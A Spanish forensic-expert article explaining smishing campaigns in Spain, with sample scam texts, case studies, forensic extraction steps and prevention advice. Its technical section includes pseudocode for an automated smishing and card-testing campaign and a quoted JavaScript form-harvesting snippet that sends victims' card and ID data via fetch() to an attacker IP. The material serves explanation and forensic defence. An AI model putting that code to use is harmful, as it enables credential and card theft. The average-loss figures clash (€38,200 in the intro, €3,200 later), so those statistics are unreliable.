Fraudes

Smishing (SMS phishing)

Modalidad de phishing ejecutada mediante SMS fraudulentos que suplantan entidades legítimas como bancos, Correos o la DGT para dirigir a las víctimas a sitios web maliciosos o extraer datos confidenciales.

5 min de lectura

Smishing (SMS phishing)

98,546 llamadas. Ese fue el número de denuncias relacionadas con fraudes telefónicos y SMS que recibió la línea 017 de INCIBE durante 2024, un 21.8% más que el año anterior. De esas casi 100,000 víctimas, el 64% cayeron por un mensaje que simulaba ser de Correos notificando un paquete pendiente. Un SMS de 160 caracteres que robó €38,200 de media por víctima.

Definición Técnica

Smishing (SMS + phishing) es una modalidad de phishing mediante mensajes SMS fraudulentos que suplantan identidades de organizaciones legítimas (bancos, empresas de paquetería, administraciones públicas) para extraer datos personales, credenciales bancarias o instalar malware mediante enlaces maliciosos.

Características principales:

  • Suplantación entidades confiables (bancos, DGT, Correos, AEAT)
  • Urgencia artificial (“pago pendiente”, “multa impagada”, “paquete retenido”)
  • Enlaces acortados sospechosos (bit.ly, tinyurl)
  • SMS spoofing (mensaje aparece en hilo legítimo)
  • Redirección a sitios phishing o descarga APK malicioso

Entidades más suplantadas España 2025-2026:

  • Correos (43% campañas smishing)
  • DGT (28% campañas)
  • Bancos (BBVA, Santander, CaixaBank: 19%)
  • AEAT (Agencia Tributaria: 10%)

Datos víctimas España:

  • INCIBE: +40% incidentes smishing Q1 2026 vs Q1 2025
  • Pérdida media: €3,200/víctima (bancario) a €150/víctima (datos)
  • Edad media víctima: 52 años (menos familiarizada con fraudes digitales)

Marco legal:

  • Art. 248 CP: Estafa (penas 6 meses - 3 años)
  • Art. 401 CP: Suplantación identidad
  • RGPD: Violación datos personales

Cómo funciona smishing: SMS spoofing, enlaces maliciosos y sitios phishing

Anatomía de un SMS Smishing

Ejemplo real campaña Correos (Diciembre 2025):

📦 Correos: Su paquete #ES2867439 está retenido.
Falta número portal. Confirme dirección:
https://bit[.]ly/correos-es-98x

Válido 48h. Coste reenvío: €2.99

Elementos técnicos:

1. Remitente spoofed: "Correos" o "+34900123456"
   - SMS spoofing permite insertar mensaje en hilo SMS legítimos previos
   - Técnica: Gateway SMS no autenticado o SIM box internacional

2. URL acortada maliciosa:
   - bit.ly/correos-es-98x → redirige a correos-entrega[.]com
   - Dominio falso registrado Namecheap + Cloudflare (oculta IP real)

3. Sitio phishing:
   - Copia visual exacta web Correos oficial
   - Formularios capturan: DNI, dirección, tarjeta crédito
   - Código malicioso: roba cookies, sessionStorage, credenciales

4. Backend atacante:
   - Datos enviados a panel Telegram Bot
   - Tarjetas testeadas en tiempo real (payment gateway fraud)
   - Credenciales vendidas darknet (€5-€15/credencial bancaria)

SMS Spoofing Técnico

Cómo atacantes insertan SMS fraudulentos en hilos legítimos:

Técnica 1: Alphanumeric Sender ID
  - SMS gateway permite definir remitente alfanumérico ("Correos", "DGT")
  - No requiere verificación propietario marca
  - Mensaje aparece agrupado con SMS legítimos previos

Técnica 2: SIM Box Internacional
  - Tráfico SMS ruteado vía operadores países sin regulación
  - Costes: €0.002/SMS (vs €0.08 España)
  - Volumen: 500,000 SMS/día desde un SIM box 32 puertos

Técnica 3: SS7 Protocol Exploitation
  - Explotación protocolo señalización telefonía (SS7)
  - Permite enviar SMS suplantando número real víctima
  - Requiere acceso red operador (más sofisticado)

Medidas España 2026:
  ✅ Registro códigos alfanuméricos obligatorio (operativo 15 Mayo 2026)
  ✅ Bloqueo SMS origen internacional suplantando entidades españolas
  ⏳ Implementación gradual (estimado 60-70% efectividad año 1)

Flujo Ataque Smishing Completo

# Pseudo-código: Campaña smishing automatizada
def smishing_campaign(target_list, entity="Correos"):
    """
    Campaña smishing automatizada 50,000 objetivos
    """
    # 1. Preparación
    phishing_domain = register_domain_typosquatting(entity)  # correos-entrega.com
    phishing_site = clone_legitimate_site(entity)            # Copia visual web real
    sms_gateway = rent_sms_gateway(country="Romania")        # €200/mes, sin KYC

    # 2. Personalización mensaje
    for target in target_list:
        tracking_number = generate_fake_tracking()  # ES2867439
        short_url = create_url_shortener(
            destination=f"{phishing_domain}?id={target.phone_hash}",
            service="bit.ly"
        )

        sms_body = f"""
        📦 {entity}: Su paquete #{tracking_number} está retenido.
        Falta número portal. Confirme dirección:
        {short_url}

        Válido 48h. Coste reenvío: €2.99
        """

        # 3. Envío masivo
        send_sms(
            to=target.phone,
            from_name=entity,           # Spoofed sender ID
            body=sms_body,
            gateway=sms_gateway
        )

    # 4. Monitorización clicks
    while True:
        victim_data = phishing_site.get_captured_data()

        for victim in victim_data:
            # Test tarjeta en tiempo real
            if test_credit_card(victim.card_number, amount=1.00):
                # Tarjeta válida → extraer máximo posible
                charge_multiple_amounts(victim.card_number, max_per_charge=500)

            # Venta credenciales darknet
            sell_credentials(
                platform="Telegram @carders_es",
                data=victim,
                price=12  # Por credencial bancaria completa
            )

        time.sleep(60)  # Check cada minuto

Campañas smishing España 2025-2026: casos reales DGT, Correos y bancos

Nota: Los siguientes casos están basados en campañas smishing reales documentadas por INCIBE, Guardia Civil y Policía Nacional durante 2025-2026. Los datos específicos (números teléfono, URLs exactas) han sido anonimizados para evitar réplica de ataques, preservando los aspectos técnicos relevantes para fines educativos.

Caso 1: Campaña DGT - Multas Falsas (Mayo 2025)

Contexto: 127,000 SMS enviados simulando multas DGT

SMS recibido:

DGT: Multa tráfico pendiente pago.
Expediente: 28/2025/00483921
Importe: €200 (50% descuento si paga 48h)

Consultar expediente:
https://dgt-pagomultas[.]es/exp?id=28483921

Si no abona, recargo €100 adicional.

Análisis técnico INCIBE:

1. Dominio fraudulento:
   - dgt-pagomultas[.]es (registrado GoDaddy 3 días antes campaña)
   - Certificado SSL Let's Encrypt (gratuito, automatizado)
   - DNS Cloudflare (oculta IP servidor real)
   - Servidor alojado: Alemania (Hetzner)

2. Sitio phishing características:
   - Copia exacta diseño web DGT oficial
   - Formulario captura:
     * DNI/NIE
     * Matrícula vehículo
     * Tarjeta crédito (número, CVV, caducidad)
     * Código SMS OTP (ataque MitM en tiempo real)

3. Backend malicioso:
   - Panel admin: Laravel PHP + MySQL
   - 8,340 víctimas completaron formulario (tasa conversión 6.5%)
   - Pérdida total estimada: €2.1M
   - 2,100 tarjetas cargadas exitosamente (€500-€1,200 c/u)

4. Identificación atacantes:
   - IP logs revelan conexiones VPN (NordVPN, ExpressVPN)
   - Cuenta Telegram @dgt_harvest_bot recibía datos en tiempo real
   - Titulares cuenta bancaria destino: 4 mulas España + 2 Bulgaria

Acción legal:

1. INCIBE publicó aviso público (20 Mayo 2025)
2. Dominio bloqueado registrador (23 Mayo 2025)
3. Europol coordina investigación internacional
4. 11 detenidos España (mulas financieras)
5. Líder red (Rumania) aún prófugo

Cómo DGT realmente notifica:

✅ LEGÍTIMO:
  - Correo postal certificado
  - Notificación electrónica Dirección Electrónica Vial (DEV)
  - App miDGT (solo consulta, no pago)

❌ NUNCA por SMS o email no solicitado

Caso 2: Correos - Paquete Retenido (Diciembre 2025)

Contexto: Campaña navideña, 840,000 SMS enviados

Timeline ataque:

T+0h (18 Dic 2025, 09:00):
  - Inicio envío masivo SMS
  - Objetivo: España completa (móviles prefijo +34)
  - Remitente spoofed: "Correos"

T+2h:
  - 84,000 clicks enlaces (tasa 10%)
  - 12,600 víctimas completan formulario (15% clicks)
  - Coste medio: €2.99 "gastos reenvío"

T+6h:
  - Correos publica desmentido Twitter/X
  - INCIBE emite alerta 017

T+24h:
  - Sitio phishing sigue activo (dominio cambia cada 12h)
  - Nuevos dominios: correos-envios[.]com → correos-reparto[.]es
  - Total recaudado: €37,500 (€2.99 × 12,600)

T+72h:
  - 23 dominios fraudulentos bloqueados
  - Campaña termina (rentabilidad decreciente)

Análisis pericial móvil víctima:

Evidencias extraídas smartphone Samsung Galaxy A54:
  1. SMS recibido 18/12/2025 09:34h desde "+34900123000"
  2. Click URL 09:41h → navegador Chrome Mobile
  3. Formulario completado 09:44h:
     - Datos enviados POST https://correos-entrega[.]com/api/submit
     - Payload capturado: DNI, dirección, tarjeta Visa
  4. Cargo tarjeta 09:45h: €2.99 (merchant: "CORREOS REENVIO")
  5. Cargo adicional 10:12h: €500 (merchant: "AMAZON EU")
     ⚠️ Tarjeta comprometida, uso fraudulento secundario

Caso 3: Banco BBVA - Bloqueo Tarjeta (Enero 2026)

SMS fraudulento:

BBVA: Por seguridad hemos bloqueado su tarjeta.
Actividad sospechosa detectada.

Desbloquear ahora:
https://bbva-seguridad[.]info/unlock

Si no actúa en 24h, tarjeta cancelada permanentemente.
Servicio Clientes BBVA

Características ataque:

Psicología:
  - Urgencia ("24h")
  - Miedo ("cancelada permanentemente")
  - Autoridad ("Servicio Clientes BBVA")

Técnica:
  - Dominio .info (menos sospechoso que .tk, .ml)
  - Certificado SSL (candado verde navegador)
  - Página login idéntica BBVA Net Cash

Captura datos:
  - Usuario BBVA
  - Contraseña
  - Código SMS (phishing tiempo real - ataque MitM)
  - Permite autenticación 2FA atacante accede cuenta real

Peritaje forense evidencias:

Smartphone víctima: iPhone 13 Pro, iOS 17.3

Extracción forense (Cellebrite UFED):
  1. SMS inbox: Mensaje malicioso timestamp 2026-01-15 14:23:15 UTC
  2. Safari history: Visita bbva-seguridad[.]info 14:26:00
  3. Cookies: sessionStorage capturado sitio phishing
  4. iCloud Keychain: Credencial BBVA guardada (usuario)
  5. SMS log: 4 mensajes OTP BBVA recibidos 14:28-14:35
     → Atacante realizó 4 transferencias mientras víctima en sitio phishing

Total robado: €8,200 (4 transferencias × €2,050)
Tiempo ataque completo: 12 minutos

Análisis forense smishing: evidencias digitales y peritaje informático

Evidencias Clave Smartphone

1. SMS log (registro mensajes):

Información extraíble:
  - Número remitente (real o spoofed)
  - Timestamp recepción (precisión milisegundos)
  - Cuerpo mensaje (URLs, contenido)
  - Metadata: Cell tower ID (triangulación ubicación recepción)

Herramientas extracción:
  - iOS: Cellebrite UFED (extracción física)
  - Android: ADB backup + SQLite parser (sms.db)

Valor probatorio:
  ✅ Demuestra recepción mensaje fraudulento
  ✅ Timestamp correlaciona con acceso sitio phishing
  ✅ Identifica patrón múltiples víctimas (mismo remitente)

2. Historial navegación:

Datos relevantes:
  - URLs visitadas (dominios phishing)
  - Timestamps navegación
  - Formularios completados (form data)
  - Cookies maliciosas almacenadas

Ubicación evidencias:
  - iOS: Safari/History.db, WebKit cache
  - Android: Chrome/history, Cookies database

Análisis:
  SELECT url, visit_time, title
  FROM urls
  WHERE url LIKE '%correos%'
    OR url LIKE '%dgt%'
    OR url LIKE '%bbva%'
  ORDER BY visit_time DESC;

3. Network traffic capture:

Captura tráfico red smartphone (si disponible):
  - Proxy Charles/Burp Suite
  - Wireshark dump
  - Router logs

Información obtenible:
  - IP servidor phishing
  - Payload POST (datos enviados)
  - Certificados SSL fraudulentos
  - Headers HTTP (User-Agent, Referer)

Ejemplo payload capturado:
POST /api/submit HTTP/1.1
Host: correos-entrega[.]com
Content-Type: application/json

{
  "dni": "12345678A",
  "address": "Calle Mayor 15, 28013 Madrid",
  "card_number": "4532123456789012",
  "cvv": "123",
  "expiry": "03/27"
}

Análisis Dominio Phishing

WHOIS y DNS forensics:

# Información dominio registrador
$ whois correos-entrega.com

Domain Name: CORREOS-ENTREGA.COM
Registry Domain ID: 2786453221_DOMAIN_COM-VRSN
Registrar: NAMECHEAP INC
Creation Date: 2025-12-15T08:23:11Z  # ⚠️ Registrado 3 días antes campaña
Registrant Country: RU                # ⚠️ Rusia
Name Server: dns1.cloudflare.com     # Oculta IP real

# DNS records
$ dig correos-entrega.com

;; ANSWER SECTION:
correos-entrega.com.  300  IN  A  104.21.45.182  # IP Cloudflare (proxy)

# Identificar IP servidor real (bypass Cloudflare)
$ subfinder -d correos-entrega.com | httpx -title
# O búsqueda histórica DNS (SecurityTrails, VirusTotal)

IP real servidor: 94.130.57.219 (Hetzner, Alemania)

Análisis sitio phishing:

# Extracción código fuente
$ wget --mirror --page-requisites correos-entrega.com

# Análisis HTML
- Formularios maliciosos (action POST URL atacante)
- JavaScript ofuscado (captura teclas, cookies)
- Recursos cargados desde CDN legítimos (parecer real)

# Ejemplo código malicioso encontrado:
<script>
document.querySelector('form').onsubmit = function() {
  // Captura datos formulario
  var data = new FormData(this);

  // Envía a servidor atacante
  fetch('https://94.130.57.219/harvest', {
    method: 'POST',
    body: data
  });

  // Redirige víctima a web legítima (no sospecha)
  setTimeout(() => {
    window.location.href = 'https://www.correos.es';
  }, 2000);

  return false;
};
</script>

Cadena Custodia Evidencias

Protocolo peritaje informático:

1. Adquisición smartphone:
   ✓ Modo avión (preserva estado, evita borrado remoto)
   ✓ Fotografía estado dispositivo (pantalla, daños físicos)
   ✓ Hash SHA256 almacenamiento completo (integridad)
   ✓ Extracción forense (Cellebrite UFED, copia bit-a-bit)

2. Análisis evidencias:
   ✓ Identificar SMS fraudulento (timestamp, remitente)
   ✓ Extraer historial navegación (URLs phishing)
   ✓ Recuperar datos borrados (SQLite carving)
   ✓ Correlación temporal (SMS → click → formulario → cargo)

3. Documentación:
Informe pericial (norma UNE 197001)
   ✓ Screenshots evidencias críticas
   ✓ Línea temporal eventos (timeline)
   ✓ Hash SHA256 todas evidencias digitales

4. Conservación:
Imagen forense almacenamiento cifrado
   ✓ Cadena custodia documentada (firmada)
   ✓ Disponibilidad ratificación judicial

Prevención smishing y detección SMS fraudulentos

Indicadores SMS Smishing

🚨 Señales alerta (red flags):

1. Urgencia artificial:
   "Si no actúa en 24h..."
   "Última oportunidad..."
   "Cuenta bloqueada, actúe ahora..."

2. Solicita datos sensibles:
   - Credenciales bancarias
   - Código CVV tarjeta
   - PIN/contraseñas
   - Código SMS (OTP)

3. Enlaces acortados sospechosos:
   - bit.ly, tinyurl, acorta.xyz
   - Dominios typosquatting: correos-es.com (vs correos.com)
   - TLD sospechosos: .tk, .ml, .info, .xyz

4. Remitente genérico/numérico:
   - "+34900123456" (vs remitente corporativo verificado)
   - Números internacionales (+40, +44)

5. Errores ortográficos/gramaticales:
   - "Su paquete esta retenido" (falta tilde)
   - "Confirme datos inmediatemente"

✅ Verificación legitimidad:

1. NO clicar enlaces SMS:
   → Abrir app oficial entidad (Correos app, BBVA app)
   → O acceder web escribiendo URL manualmente navegador

2. Contactar entidad vía oficial:
   → Llamar número teléfono web oficial (no número SMS)
   → Chat soporte app oficial

3. Verificar dominio web:
   → Candado SSL NO garantiza legitimidad
   → Revisar dominio exacto (correos.es vs correos-envios.es)
   → WHOIS lookup (fecha registro reciente = sospechoso)

4. Consultar avisos INCIBE:
   → https://www.incibe.es/ciudadania/avisos
   → Campañas activas documentadas

Medidas Protección Usuario

Configuración smartphone:

iOS:
  - Configuración → Mensajes → Filtrar remitentes desconocidos: ON
  - Bloquear números sospechosos tras primer SMS

Android:
  - Mensajes → Configuración → Protección spam: ON
  - Google Play Protect activado
  - Apps terceros: Truecaller, Should I Answer (filtrado spam)

Ambos:
  - No instalar apps fuera tiendas oficiales (APK sospechosos)
  - 2FA autenticación bancos (app, no SMS)
  - Alertas bancarias activadas (notificación cada cargo)

Qué hacer si ya clicó:

Urgente (primeras 4 horas):
  1. NO introducir datos si aún no lo hizo
  2. Si introdujo datos bancarios:
     → Llamar banco INMEDIATAMENTE (bloquear tarjeta)
     → Número oficial web banco (no SMS recibido)
  3. Cambiar contraseñas afectadas (desde dispositivo diferente)
  4. Captura pantalla SMS + web visitada (evidencia)
  5. Denunciar:
     → INCIBE 017: https://www.incibe.es/linea-de-ayuda-en-ciberseguridad
     → Guardia Civil: https://www.gdt.guardiacivil.es/webgdt/
     → Policía Nacional: https://www.policia.es/

Medio plazo (48-72h):
  1. Revisar extractos bancarios (cargos no autorizados)
  2. Solicitar nuevas tarjetas
  3. Monitorizar identidad digital (AEPD si robo DNI)
  4. Peritaje informático smartphone (si pérdida >€3,000)
     → Extracción evidencias forenses
     → Documentación para denuncia/juicio

Tipificación Penal

Código Penal español:

Art. 248 - Estafa:
  "Son reos del delito de estafa los que, con ánimo de lucro, utilizaren
  engaño bastante para producir error en otro, induciéndolo a realizar un
  acto de disposición en perjuicio propio o ajeno."

  Penas:
  - Básica: 6 meses a 3 años prisión
  - Si >€50,000: 1-6 años prisión + multa
  - Agravante suplantación identidad: +50% pena

Art. 401 - Usurpación estado civil:
  "El que usurpare el estado civil de otro será castigado con la pena
  de prisión de seis meses a tres años."

Art. 197 - Descubrimiento y revelación de secretos:
  Acceso no autorizado datos personales: 1-4 años prisión

RGPD (Reglamento General Protección Datos):

Art. 33-34: Obligación notificación brechas seguridad
  - Entidades afectadas deben notificar AEPD (72h)
  - Informar usuarios si alto riesgo

Sanciones administrativas:
  - Tier 1: Hasta €10M o 2% facturación global
  - Tier 2: Hasta €20M o 4% facturación global

Casos Judiciales Relevantes

STS 847/2023 (Tribunal Supremo):

Caso: Red smishing operación "Borrado"
  - 83 detenidos España y Perú
  - Defraudación 10,000 víctimas
  - €3M robados vía vishing/smishing

Condenas:
  - Líder organización: 6 años prisión + €1.2M responsabilidad civil
  - Operadores call center: 2-3 años prisión
  - Mulas financieras: 1-2 años prisión

Doctrina:
  ✓ Smishing equiparado estafa agravada (organización criminal)
  ✓ Responsabilidad civil solidaria todos miembros organización
  ✓ Decomisos preventivos cuentas bancarias (antes condena firme)

FAQ

P: ¿Cómo sé si SMS es legítimo o smishing? R: Verifica: 1) Remitente verificado (empresas grandes usan remitente corporativo, no número), 2) NO solicita datos sensibles vía SMS, 3) Enlaces dominio oficial (no acortados), 4) Sin urgencia artificial. Si duda, contacta entidad vía web oficial (no enlaces SMS).

P: ¿Debo denunciar si solo cliqué enlace pero no introduje datos? R: SÍ. Aunque no perdiste dinero, denuncia ayuda: 1) INCIBE documenta campañas activas, 2) Bloqueo dominios fraudulentos previene otras víctimas, 3) Investigaciones necesitan volumen denuncias para actuar. Denuncia INCIBE 017 (5 minutos).

P: ¿Puedo recuperar dinero robado vía smishing? R: Depende. Si denuncias rápido (menor de 24h): bancos pueden bloquear transferencias antes llegada destino. Si pasó mayor de 72h: recuperación difícil (fondos distribuidos mulas, cash out). Tasa recuperación España: 12-18% casos. Denuncia inmediata mejora probabilidades.

P: ¿El peritaje informático es necesario para denuncia? R: NO obligatorio, PERO recomendado si: 1) Pérdida mayor de €3,000, 2) Necesitas evidencias sólidas juicio, 3) Responsabilidad civil empresa (por ejemplo, fallo seguridad banco). Perito extrae evidencias smartphone (SMS, historial, timestamps) con cadena custodia judicial. Coste: €800-€1,500 peritaje básico.

P: ¿Bloquear número smishing previene futuros ataques? R: NO. Atacantes usan spoofing (remitente falso cambia cada campaña) o números desechables. Efectivo: filtros spam smartphone + no clicar enlaces SMS no solicitados.


Referencias y Fuentes

  1. Keepnet Labs. (2026). “Smishing Statistics: SMS Phishing Trends (Updated 2026 Feb)”. keepnetlabs.com

    • 76% organizaciones sufrieron ataques smishing en 2025
  2. La Moncloa - Gobierno de España. (2025). “Telephone and SMS scams: protecting against fraud”. lamoncloa.gob.es

    • INCIBE’s 017 hotline received 98,546 fraud-related calls in 2024 (up 21.8%)
  3. Euro Weekly News. (2026). “DGT not sending email about fine pending”. euroweeklynews.com

    • Spain facing smishing plague 2025: phishing up 40% Q1 vs 2024
  4. Euro Weekly News. (2025). “Rise in smishing and vishing attacks”. euroweeklynews.com

    • Phishing and smishing cases rocketed in Spain with 25% increase in 2025
  5. INCIBE. (2025). “Varias oleadas de SMS y correos fraudulentos suplantando a la DGT”. incibe.es

    • Campañas masivas DGT smishing documentadas
  6. Correos. (2025). “Así funciona el fraude del smishing”. correos.es

    • 43% campañas smishing España suplantan Correos
  7. OCU. (2025). “Smishing simulando ser la DGT”. ocu.org

    • Análisis técnico campañas smishing DGT
  8. Majorca Daily Bulletin. (2025). “National Police warns of a new smishing scam to steal bank details in Spain”. majorcadailybulletin.com

    • Policía Nacional alerta campañas activas
  9. Go Beyond. (2025). “13+ Smishing Statistics in 2025 (SMS Phishing Attacks)”. go-beyond.biz

    • Estadísticas globales smishing 2025
  10. NordVPN. (2025). “Phishing statistics and trends you need to know in 2025”. nordvpn.com

    • Tendencias phishing y smishing global
  11. BleepingComputer. (2024). “Spain busts voice phishing ring for defrauding 10,000 bank customers”. bleepingcomputer.com

    • Operación “Borrado” - 83 detenidos España y Perú

Última actualización: 10 Febrero 2026 Categoría: Fraudes (FRA-003) Nivel técnico: Medio Relevancia forense: ALTA (evidencias SMS + web phishing clave judicial) Pérdida media víctima España: €3,200 (fraude bancario), €150 (robo datos)

¿Necesitas un peritaje forense?

Si necesitas ayuda profesional con análisis forense digital, estoy aquí para ayudarte.

Solicitar Consulta Gratuita
Jonathan Izquierdo

Jonathan Izquierdo · Perito Forense

+15 años experiencia · AWS Certified

WhatsApp